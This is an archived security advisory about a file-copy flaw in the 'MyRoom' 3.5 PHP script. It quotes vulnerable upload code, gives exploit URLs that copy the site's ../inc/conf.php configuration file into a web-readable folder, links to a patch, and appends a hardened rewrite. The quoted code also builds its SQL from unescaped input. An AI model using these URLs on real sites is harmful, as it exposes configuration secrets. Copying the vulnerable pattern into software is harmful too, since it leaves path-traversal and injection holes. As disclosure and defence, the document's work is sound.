Informations :
°°°°°°°°°°°°°°
Website : http://www.plansbiz.net
Version : 3.5 GOLD
Problems : File copy/upload

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
room/save_item.php :
------------------------------------------------------------------------
if($name == "" OR $ref == ""){
    echo "You are fogot enter your 'ITEM NAME' or 'ITEM REF NO' !";
    echo "<br>";
    echo "<a href='$main_file?show=additem'>Try Agains [ Click Here ]</a>";
    exit;
}
if($photo!="none" AND $photo!="application/octet-stream"){
    //get type of file
    $filetype=$photo_type;
    //get lenght of image type
    $filelenght=strlen($filetype);
    //get part of file image to build image extension
    $pos=strpos($filetype,"/")+1;
    //build extension of image
    $fileextention=substr($filetype,$pos,$filelenght);
    if($fileextention=="pjpeg"){
        $fileextention="jpg";
    }
    $image=date("YmdHis");
    $image.=".".$fileextention;
    $imgpath = "$imgroot";
    //if image exist, upload it in correct dir
    if($photov<>"none") {
        if(!copy($photo,"$imgpath/$image")) {
            //display errors
            $msg="<br><font color='text00'>File Not Uploaded, it might be too large or does not exist..<br>Please Try Again!</font>";
            break;
        }
        //or finish
        else {
            dbconnect();
            $sql= "INSERT INTO room_item SET it_photo='$image', it_name='$name', it_decs='$decs', it_ab='$album', it_ref='$ref'";
            mysql_query($sql) or die(mysql_error());
            echo "<meta http-equiv='refresh' content='0;URL= $main_file?show=additem&m=1&i=$name'>";
            echo "<br>Your File Was Uploaded Sucessful!! <br><br><a href='$main_file?show=additem&m=1&i=$name'>Loading ......</a>";
        }
    }
------------------------------------------------------------------------

Exploits :
°°°°°°°°°°
http://[target]/room/save_item.php?name=[NAME]&ref=hacked&photo=../inc/conf.php&photo_type=ttxt
+
http://[target]/room/index.php?show=search&search=it_name&item=[NAME]
to find the URL of the txt file that holds conf.php.

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (English version available).
More Details :
°°°°°°°°°°°°°°
In French : http://www.frog-man.org/tutos/MyRoom.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyRoom.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
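The copy() call in room/save_item.php takes its source path from the request-supplied photo value and builds the extension from photo_type. A hardened form of that step follows, as an added example that is neither the vendor's code nor the patch referenced in the advisory. Assumptions: PHP 7 or later, a PDO handle $db, a form field named "photo"; save_item_photo() is a hypothetical name.

```php
<?php
// Added example, not the vendor's code or the phpsecure.info patch.
// Assumptions: $db is a PDO handle, $imgroot is the image directory used by the
// original snippet, and save_item_photo() is a hypothetical helper name.

function save_item_photo(PDO $db, string $imgroot, array $file, array $fields): string
{
    // Accept the file only from PHP's upload machinery, never from a request variable.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('No valid upload received');
    }

    // Derive the type from the file contents, not from a client-supplied type string.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('Unsupported image type');
    }

    // Server-chosen file name; the extension comes from the allowlist only.
    $image = date('YmdHis') . '_' . bin2hex(random_bytes(4)) . '.' . $allowed[$mime];

    // move_uploaded_file() refuses any source path that is not a genuine upload.
    if (!move_uploaded_file($file['tmp_name'], rtrim($imgroot, '/') . '/' . $image)) {
        throw new RuntimeException('Could not store upload');
    }

    // Same table and columns as the original INSERT, with bound parameters.
    $stmt = $db->prepare(
        'INSERT INTO room_item (it_photo, it_name, it_decs, it_ab, it_ref)
         VALUES (?, ?, ?, ?, ?)'
    );
    $stmt->execute([
        $image,
        $fields['name'] ?? '',
        $fields['decs'] ?? '',
        $fields['album'] ?? '',
        $fields['ref'] ?? '',
    ]);
    return $image;
}

// Call site in the request handler, reading values explicitly from the superglobals:
// $image = save_item_photo($db, $imgroot, $_FILES['photo'], $_POST);
```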
This archive was generated by hypermail 2b30 : Wed Jan 22 2003 - 00:45:37 PST